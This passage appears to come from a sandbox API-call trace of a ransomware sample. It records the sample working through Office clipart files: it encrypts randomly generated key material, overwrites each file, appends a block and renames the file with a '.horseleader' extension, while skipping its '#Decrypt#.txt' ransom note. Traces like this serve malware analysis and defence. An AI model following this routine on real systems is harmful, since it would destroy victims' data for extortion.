hFile=0x158, liDistanceToMove=0xfffff7e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.383] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.383] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.383] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.383] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.383] CloseHandle (hObject=0x158) returned 1 [0254.384] GetProcessHeap () returned 0x780000 [0254.384] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.384] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.horseleader") returned 79 [0254.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.horseleader")) returned 1 [0254.385] GetProcessHeap () returned 0x780000 [0254.385] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.385] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7d4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01168_.WMF", cAlternateFileName="")) returned 1 [0254.385] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="Windows") returned -1 [0254.385] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 67 [0254.385] StrStrIW (lpFirst="DD01168_.WMF", lpSrch=".horseleader") returned 0x0 [0254.385] lstrcmpW (lpString1="DD01168_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.385] lstrcmpW (lpString1="DD01168_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.385] lstrlenW (lpString=".testttjffg") returned 11 [0254.385] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.385] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.385] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.386] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 67 [0254.386] StrStrW (lpFirst="DD01168_.WMF", lpSrch=".txt") returned 0x0 [0254.386] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2004) returned 1 [0254.386] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7d4, lpOverlapped=0x0) returned 1 [0254.389] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff82c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.389] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7d4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7d4, lpOverlapped=0x0) returned 1 [0254.390] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.391] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.391] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.391] CloseHandle (hObject=0x158) returned 1 [0254.391] GetProcessHeap () returned 0x780000 [0254.391] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.391] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.horseleader") returned 79 [0254.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.horseleader")) returned 1 [0254.393] GetProcessHeap () returned 0x780000 [0254.393] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.393] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01169_.WMF", cAlternateFileName="")) returned 1 [0254.393] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="Windows") returned -1 [0254.393] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 67 [0254.393] StrStrIW (lpFirst="DD01169_.WMF", lpSrch=".horseleader") returned 0x0 [0254.393] lstrcmpW (lpString1="DD01169_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.393] lstrcmpW (lpString1="DD01169_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.393] lstrlenW (lpString=".testttjffg") returned 11 [0254.393] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.393] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.393] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 67 [0254.395] StrStrW (lpFirst="DD01169_.WMF", lpSrch=".txt") returned 0x0 [0254.395] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2020) returned 1 [0254.395] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7e4, lpOverlapped=0x0) returned 1 [0254.410] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff81c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.410] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7e4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7e4, lpOverlapped=0x0) returned 1 [0254.410] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.411] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.411] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.411] CloseHandle (hObject=0x158) returned 1 [0254.411] GetProcessHeap () returned 0x780000 [0254.411] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.411] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.horseleader") returned 79 [0254.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.horseleader")) returned 1 [0254.412] GetProcessHeap () returned 0x780000 [0254.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.413] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x964, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01170_.WMF", cAlternateFileName="")) returned 1 [0254.413] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="Windows") returned -1 [0254.413] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 67 [0254.413] StrStrIW (lpFirst="DD01170_.WMF", lpSrch=".horseleader") returned 0x0 [0254.413] lstrcmpW (lpString1="DD01170_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.413] lstrcmpW (lpString1="DD01170_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.413] lstrlenW (lpString=".testttjffg") returned 11 [0254.413] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 67 [0254.414] StrStrW (lpFirst="DD01170_.WMF", lpSrch=".txt") returned 0x0 [0254.414] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2404) returned 1 [0254.414] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x964, lpOverlapped=0x0) returned 1 [0254.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff69c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.417] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x964, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x964, lpOverlapped=0x0) returned 1 [0254.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.417] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.418] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.418] CloseHandle (hObject=0x158) returned 1 [0254.418] GetProcessHeap () returned 0x780000 [0254.418] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.418] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.horseleader") returned 79 [0254.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.horseleader")) returned 1 [0254.419] GetProcessHeap () returned 0x780000 [0254.419] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.419] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01171_.WMF", cAlternateFileName="")) returned 1 [0254.420] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="Windows") returned -1 [0254.420] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 67 [0254.420] StrStrIW (lpFirst="DD01171_.WMF", lpSrch=".horseleader") returned 0x0 [0254.420] lstrcmpW (lpString1="DD01171_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.420] lstrcmpW (lpString1="DD01171_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.420] lstrlenW (lpString=".testttjffg") returned 11 [0254.420] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 67 [0254.422] StrStrW (lpFirst="DD01171_.WMF", lpSrch=".txt") returned 0x0 [0254.422] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2052) returned 1 [0254.422] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0254.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.424] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x804, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0254.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.425] CloseHandle (hObject=0x158) returned 1 [0254.425] GetProcessHeap () returned 0x780000 [0254.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.425] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.horseleader") returned 79 [0254.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.horseleader")) returned 1 [0254.427] GetProcessHeap () returned 0x780000 [0254.427] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.427] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01172_.WMF", cAlternateFileName="")) returned 1 [0254.427] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="Windows") returned -1 [0254.427] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 67 [0254.427] StrStrIW (lpFirst="DD01172_.WMF", lpSrch=".horseleader") returned 0x0 [0254.427] lstrcmpW (lpString1="DD01172_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.427] lstrcmpW (lpString1="DD01172_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.427] lstrlenW (lpString=".testttjffg") returned 11 [0254.427] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 67 [0254.429] StrStrW (lpFirst="DD01172_.WMF", lpSrch=".txt") returned 0x0 [0254.429] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2232) returned 1 [0254.429] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8b8, lpOverlapped=0x0) returned 1 [0254.434] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff748, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.435] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8b8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8b8, lpOverlapped=0x0) returned 1 [0254.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.435] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.435] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.435] CloseHandle (hObject=0x158) returned 1 [0254.436] GetProcessHeap () returned 0x780000 [0254.436] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.horseleader") returned 79 [0254.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.horseleader")) returned 1 [0254.437] GetProcessHeap () returned 0x780000 [0254.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.437] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x70c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01173_.WMF", cAlternateFileName="")) returned 1 [0254.437] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="Windows") returned -1 [0254.437] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 